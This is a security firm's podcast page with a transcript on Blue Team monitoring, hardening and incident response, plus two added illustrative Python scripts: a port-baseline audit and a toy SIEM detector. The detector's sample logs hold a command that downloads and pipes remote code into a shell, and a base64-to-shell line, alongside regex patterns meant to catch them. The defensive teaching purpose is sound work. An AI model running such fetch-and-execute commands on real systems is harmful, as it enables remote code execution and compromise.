Cipher Podcast: Behind the Scenes of Blue Team Operations
The topic of this episode is Red vs. Blue Team operations; the team also touches on the newer Purple Team concept. Cipher Director of Technology and SOC Manager Ricardo Encinosa explores Blue Teams, which are tasked with defending a company from cyber attacks. He talks about the different systems used to defend the digital assets of companies and their benefits, and covers how logs and data paint the picture of a company’s cybersecurity posture. Identifying and detecting cybersecurity incidents is the groundwork for defense. The hosts also cover popular attack techniques and how Blue Teams perform incident response. Finally, Ricardo covers what he looks for when hiring people to join the Cipher Blue Team.
For more information about Cipher’s Blue Team, visit our page on Managed Security Services. Blue Teams are the heart of Cipher’s 24×7 cybersecurity protection.
Visit the podcast page for all episodes or listen on the platforms below.
Podcast Episode Transcript
Pete: Welcome everyone, my name is Peter Hackett. I am the Global Program Director for Cipher. In today’s episode, we are going to discuss Blue Team Operations and what happens during the initial moments following the detection of a cybersecurity incident. Also with me today is my colleague Scott Croskey, the Global Chief Information Security Officer for Cipher. We are pleased to have with us the Director of Technology and the SOC Manager for our North America operations, Ricardo Encinosa. Ricky comes to us today from Miami, Florida.
Ricky, how are you today?
Ricky: Thank you for that introduction Pete, I am doing well, happy to be on here today.
Pete: Thanks Ricky. And before we begin, I want to highlight to our listeners that Cipher is pleased to have been listed for the month of July as being #50 on the Top 200 most popular podcasts by Chartable in the Brazil Tech Podcast category. We’ve hosted these podcasts for the past three months and look forward to continuing to climb the charts in not only Brazil, but in North America, EMEA and the rest of the world!
Pete: Ok, let’s set the stage for today’s conversation. If you’ve been in or associated with the world of Information Security, you’ve probably heard the terms Red Team and Blue Team before. Most recently, the term Purple Team has been added to this lexicon. Last week we spent time talking about some of our Red Team services as we spoke with Sergio Alves on some tips from a penetration tester. This week, we will focus on Blue Teams and what activities are associated with Blue Teaming. But first, let’s get an understanding of exactly what these terms mean. Scott, can you let our listeners know the difference between Red, Blue and Purple teams?
Scott: Of course Pete. The Red Team and Blue Team terminology concept was first used in the United States Department of Defense, although the general concept has been used in history for decades. When it came to exercising and improving the United States military’s ability to fight an adversary, special focus was placed on training and testing specialized teams. Red Teams are those groups that are focused on emulating adversarial activities. To give you more context, in the early 1970s, the United States Air Force began conducting exercises called Red Flag which are intended to offer realistic air-combat training for military pilots and flight crew members. During Red Flag, the Red Team Air Force uses aircraft, tactics and techniques of enemy nation states to test the capabilities of US Air Force pilots. The color Red was selected because in the 1970s, the primary adversary of the United States was Communism. Hence the color Red. The friendly forces of the United States were always denoted by the color Blue. Following the establishment of Red Flag, the United States Air Force saw a dramatic increase in Air Force pilot capabilities against our adversaries. In the 1990s, this same concept was adopted by the United States Department of Defense for Information Security operations. INFOSEC Red Teams were organized in order to emulate the tactics, techniques and procedures used by many hacking groups and subsequently test the security network defenses of the United States, hence the Blue Team.
Fast forward into the twenty first century, the private sector adopted the terminology to represent specialized skills and services offered by cybersecurity companies. As you indicated earlier Pete, last week we dove into some of our Red Team services to include offensive security, ethical hacking, penetration tests and application testing.
Blue Teams are those team members who focus on defending a computer network. Activities include operating defensive security tools, hardening computer network infrastructure, conducting incident response activities, threat hunting, digital forensics, and overall damage control. These are the primary services in Cipher’s Managed Security Service (MSS), Managed Detection & Response (MDR), and Cyber Intelligence Services (CIS). Ricky is our SOC Manager for North America and essentially leads delivery of Blue Team services for our North American customers. I know his schedule is rather busy and it’s great to have some of his time today to talk about all the great work he and his team does for our customers.
Before we get to Blue Team Operations, I just want to spend a moment talking about a newer term adopted by the cybersecurity industry, which is Purple Teams. As you can imagine, Purple is a combination of Red and Blue. Purple Teams are those groups that have blended background in offensive and defensive cybersecurity operations. Their goal is to work with Blue Teams to facilitate improvement in cyber incident detection, defenses, and sharpening the skills of both Blue and Red team members. Typically we see the utilization of Purple Teams for larger and more mature organizations. But when it comes to Red and Blue teams, this is the quick summary of what these terms mean.
Pete: Thanks Scott. Let’s turn now to diving into the Blue Team Operations. Ricky, as Director of Technology and the SOC Manager for North America, can you discuss some of your roles and responsibilities?
Ricky: Cipher, being a full Managed Security Service Provider, has many service lines, some of which my colleagues talked about here today. Most of my responsibilities revolve around helping our Security Operations Centers deliver those services efficiently and effectively. To do that, I work closely with our clients and become a trusted advisor to help them with anything that may come up during the service or day to day.
Pete: Thanks Ricky. And today we would like to dive into a few real-world examples and talk about how Cipher triages cyber investigations and ultimately communicates and works with our customers through incident escalation and reporting. I’m sure your team sees a wide array of cyber incidents as you lead the delivery of our MSS and MDR services for our customers. What are the typical tools that our team uses to deliver these services? And how exactly do they aid in the detection of cyber incidents?
Ricky: Pretty much everyone has some type of a SIEM solution to bring in logs and alerts from different IT and security devices. This provides visibility into the network, correlation, and alerting capability, and lets us query data for reporting, investigation, and audit purposes. Some of the log sources include network devices and operating system logs, the output of vulnerability scans, and other security devices such as intrusion detection and prevention systems. We do like to get closer to the asset with an endpoint detection and response solution. Besides the detection and blocking capabilities, EDR solutions allow us to gather forensic data and actually mitigate threats on the assets themselves. Those are just a few examples; it really comes down to what tools we have at our disposal and the service we are providing.
Pete: I have heard that we work with our customers to help harden their computer networks. What exactly does this mean?
Ricky: Hardening in general is about understanding the business functions of an asset and creating a baseline to only allow those functions. It’s one thing to create a baseline; it’s another to ensure it’s being followed. It depends what you are hardening, but we recommend using tools such as port scanners to make sure only allowed ports are open, vulnerability scanners to check installed software, and various pen testing tools to ensure that hardening guidelines are being followed.
Pete: What are the best ways an organization can invest time and effort to greatly improve their cybersecurity maturity?
Ricky: The first two elements of the NIST cybersecurity framework are Identify and Protect. Any solution that helps you understand your hardware or software asset inventory is the first place to start, whether that means starting small and running discovery scans to find out what is out there or implementing a full-fledged vulnerability and compliance management solution to identify and mitigate risk. Once you figure out what is out there, you can begin to protect it. Second, I always recommend getting closer to the user. Implementing an advanced endpoint detection and response solution gives you the most visibility into the specific assets you want to protect and also gives you some control over them.
Pete: And what are some of the most common attack techniques your team observes?
Ricky: We deal with a lot of malware-based attacks caused by a user. What I mean by that is someone clicking on phishing emails, downloading malicious files from websites, or bringing infected files from home on a USB or downloaded through personal email. Clients spend a lot of time and money to contain, isolate, and remediate these types of incidents whether it be a simple potentially unwanted application all the way to ransomware traversing their network or breached credentials.
Pete: It seems that nearly every week, there is some major vulnerability identified in the news. I think we kicked off the year 2020 with a major Citrix NetScaler vulnerability your team had to triage. Just last week there was a major issue with F5 Load Balancers and yet another Citrix NetScaler vulnerability that affected some of our customers. How do you triage significant vulnerabilities and work with our customers to ensure they know that our detection activities are state of the art?
Ricky: As with any vulnerability, the client wants to know how to detect it and how to mitigate it. They want to know if someone is trying to exploit them and if they have already been exploited. In the case of the F5 load balancers, we used the client’s SIEM and EDR solution to create content around the known indicators of compromise. This gave us the ability to detect not only network and endpoint communication from both perimeter and endpoint devices, but also, since we are getting the actual operating system level logs, we were able to create alerts to detect the commands and files that are associated with the actual exploitation of this vulnerability.
Pete: I’ve read that the initial minutes and hours following a cybersecurity incident are the most critical for an organization to prevent significant damage to a company’s brand and reputation. How do you work with customers to define incident reporting and escalation activities?
Ricky: Cipher is a trusted partner, we are just one part in a client’s entire incident response process. A good incident response process outlines the roles and responsibilities of each member. We work with the client to streamline these processes not only for us but their entire team to ensure they are effective, and that everyone knows their role throughout the entire process.
Pete: Scott and Ricky, thank you for your time; this has been very informative, and I look forward to our next Podcast. For any of our listeners who are interested in our services, to include Managed Security Services, Managed Detection & Response, and Cyber Intelligence Services, please reach out to us via our marketing department, which can be reached at [email protected].
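Ricky describes hardening as building a baseline of allowed functions for an asset and then using a port scanner to confirm the baseline is actually being followed. The script below is an added example from the editor, not Cipher’s tooling and not part of the podcast: it parses a constructed scan written in nmap’s grepable (-oG) layout, compares each host’s open ports against a hypothetical per-role baseline, and reports ports that are open but not allowed, ports that should be listening but are not, and hosts that answered the scan but are not in the asset inventory at all. The baselines, the role inventory and the scan text are all constructed for illustration.

```python
"""Check scanned hosts against a hardening port baseline.

Added example. BASELINES, ASSET_ROLES and SAMPLE_SCAN are constructed for
illustration; the scan text follows nmap's grepable (-oG) layout but is not
real scan output.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Dict, Set, Tuple

Port = Tuple[str, int]  # (protocol, port number)

# Hypothetical baselines: the only listening ports each asset role may expose.
BASELINES: Dict[str, Set[Port]] = {
    "web": {("tcp", 22), ("tcp", 80), ("tcp", 443)},
    "db": {("tcp", 22), ("tcp", 5432)},
}

# Hypothetical asset inventory mapping addresses to roles.
ASSET_ROLES: Dict[str, str] = {"192.0.2.10": "web", "192.0.2.20": "db"}

# Constructed sample in -oG layout: "Host: <ip> (<name>)<tab>Ports: <entries>".
SAMPLE_SCAN = """\
# Nmap grepable output (constructed sample, not a real scan)
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 3306/open/tcp//mysql///
Host: 192.0.2.20 ()\tPorts: 5432/open/tcp//postgresql///, 8080/open/tcp//http-proxy///, 25/closed/tcp//smtp///
Host: 192.0.2.99 ()\tPorts: 23/open/tcp//telnet///
"""

HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\(.*?\)\s+Ports:\s+(?P<ports>.*)$")


@dataclass
class Finding:
    unexpected: Set[Port] = field(default_factory=set)  # open, not in baseline
    missing: Set[Port] = field(default_factory=set)     # in baseline, not listening
    inventoried: bool = True                             # host known to the inventory

    def compliant(self) -> bool:
        return self.inventoried and not self.unexpected and not self.missing


def parse_grepable(text: str) -> Dict[str, Set[Port]]:
    """Return {ip: {(proto, port), ...}} for ports the scan reports as open."""
    observed: Dict[str, Set[Port]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and hosts without a port list
        open_ports: Set[Port] = set()
        for entry in m["ports"].split(","):
            # Entry layout: port/state/proto/owner/service/rpc/version
            fields = entry.strip().split("/")
            if len(fields) >= 3 and fields[1] == "open":
                open_ports.add((fields[2], int(fields[0])))
        observed[m["ip"]] = open_ports
    return observed


def compare(observed: Set[Port], role: str) -> Finding:
    """Diff one host's open ports against the baseline for its role."""
    baseline = BASELINES[role]
    return Finding(unexpected=observed - baseline, missing=baseline - observed)


def audit(scan_text: str) -> Dict[str, Finding]:
    """Compare every host in the scan against its role baseline."""
    report: Dict[str, Finding] = {}
    for ip, ports in parse_grepable(scan_text).items():
        role = ASSET_ROLES.get(ip)
        if role is None:
            # A host that answers the scan but is absent from the inventory is
            # itself a finding: you cannot harden what you do not know about.
            report[ip] = Finding(unexpected=ports, inventoried=False)
        else:
            report[ip] = compare(ports, role)
    return report


if __name__ == "__main__":
    for ip, finding in audit(SAMPLE_SCAN).items():
        status = "OK" if finding.compliant() else "DEVIATION"
        print(f"{ip}: {status} {finding}")
```

The baseline is expressed per role rather than per host so that a fleet of web servers is checked against one definition; the same diff would be driven from a real `nmap -oG` file by passing its contents to `audit`.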
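When Ricky describes building SIEM and EDR content around the known indicators of compromise for a vulnerability, he names three layers of detection: network communication seen at the perimeter, file indicators on endpoints, and operating-system-level logs that reveal the commands associated with exploitation. The script below is an added example from the editor, not Cipher’s detection content and not tied to the F5 or Citrix issues mentioned in the episode: it runs that kind of three-layer content over constructed firewall and EDR log lines. The log formats, the indicator values (TEST-NET addresses, made-up hashes) and the command patterns are all hypothetical placeholders for what a vendor advisory would actually supply.

```python
"""Minimal SIEM-style detection content run over constructed log lines.

Added example. Every indicator, host name and log line here is constructed
for illustration and is not taken from any real advisory.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# --- Detection content a Blue Team would load into the SIEM (hypothetical) ---
NETWORK_IOCS = {"203.0.113.45", "198.51.100.7"}          # hypothetical C2 / scanner IPs
FILE_HASH_IOCS = {"0badc0ffee0ddf00d0badc0ffee0ddf0"}     # hypothetical dropper MD5
# Behavioural patterns for exploitation artifacts seen in OS-level process
# logs: a shell that pulls a payload with curl, or base64 decoded into a shell.
COMMAND_PATTERNS = [
    re.compile(r"\b(?:bash|sh)\s+-c\b.*\bcurl\b", re.I),
    re.compile(r"\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:sh|bash)\b", re.I),
]

# Two constructed log layouts: a perimeter firewall and an EDR process event.
FW_RE = re.compile(
    r"^(?P<ts>\S+) fw host=(?P<host>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) action=(?P<action>\S+)$"
)
PROC_RE = re.compile(
    r"^(?P<ts>\S+) edr host=(?P<host>\S+) user=(?P<user>\S+) md5=(?P<md5>[0-9a-f]{32}) cmd=(?P<cmd>.*)$"
)


@dataclass
class Alert:
    rule: str
    host: str
    evidence: str


def evaluate(line: str) -> List[Alert]:
    """Apply every rule to one log line; return zero or more alerts."""
    alerts: List[Alert] = []
    m = FW_RE.match(line)
    if m:
        # Layer 1: network indicators at the perimeter, either direction.
        for side in ("src", "dst"):
            if m[side] in NETWORK_IOCS:
                alerts.append(Alert("network-ioc", m["host"], f"{side}={m[side]}"))
        return alerts
    m = PROC_RE.match(line)
    if m:
        # Layer 2: file indicators reported by the EDR agent.
        if m["md5"] in FILE_HASH_IOCS:
            alerts.append(Alert("file-hash-ioc", m["host"], f"md5={m['md5']}"))
        # Layer 3: OS-level command lines, checked for network IOCs and for
        # exploitation behaviour (first matching pattern wins).
        for ioc in NETWORK_IOCS:
            if ioc in m["cmd"]:
                alerts.append(Alert("network-ioc", m["host"], f"cmd references {ioc}"))
        for pat in COMMAND_PATTERNS:
            if pat.search(m["cmd"]):
                alerts.append(Alert("suspicious-command", m["host"], m["cmd"]))
                break
    return alerts


def run(lines: Iterable[str]) -> List[Alert]:
    return [a for line in lines for a in evaluate(line)]


def by_host(alerts: Iterable[Alert]) -> Dict[str, int]:
    """Alert counts per host, the first thing a triage analyst looks at."""
    return dict(Counter(a.host for a in alerts))


# Constructed sample logs (not real traffic or endpoint telemetry).
SAMPLE_LOGS = [
    "2024-06-01T10:00:01Z fw host=edge-fw-01 src=192.0.2.10 dst=203.0.113.45 action=allow",
    "2024-06-01T10:00:02Z fw host=edge-fw-01 src=192.0.2.10 dst=192.0.2.20 action=allow",
    '2024-06-01T10:00:05Z edr host=web-01 user=www-data md5=0123456789abcdef0123456789abcdef cmd=sh -c "curl http://203.0.113.45/x | sh"',
    "2024-06-01T10:00:06Z edr host=ws-17 user=alice md5=0badc0ffee0ddf00d0badc0ffee0ddf0 cmd=C:\\Users\\alice\\Downloads\\invoice.exe",
    "2024-06-01T10:00:07Z edr host=ws-17 user=alice md5=fedcba9876543210fedcba9876543210 cmd=notepad.exe",
    "2024-06-01T10:00:09Z edr host=web-02 user=www-data md5=abcdefabcdefabcdefabcdefabcdefab cmd=echo aGk= | base64 -d | sh",
]


if __name__ == "__main__":
    found = run(SAMPLE_LOGS)
    for a in found:
        print(f"[{a.rule}] {a.host}: {a.evidence}")
    print(by_host(found))
```

The point of the third layer is the one Ricky makes: network and hash indicators tell you that something known touched the environment, while the command-line rules fire on the behaviour of exploitation itself and keep working after the attacker rotates infrastructure or recompiles a payload.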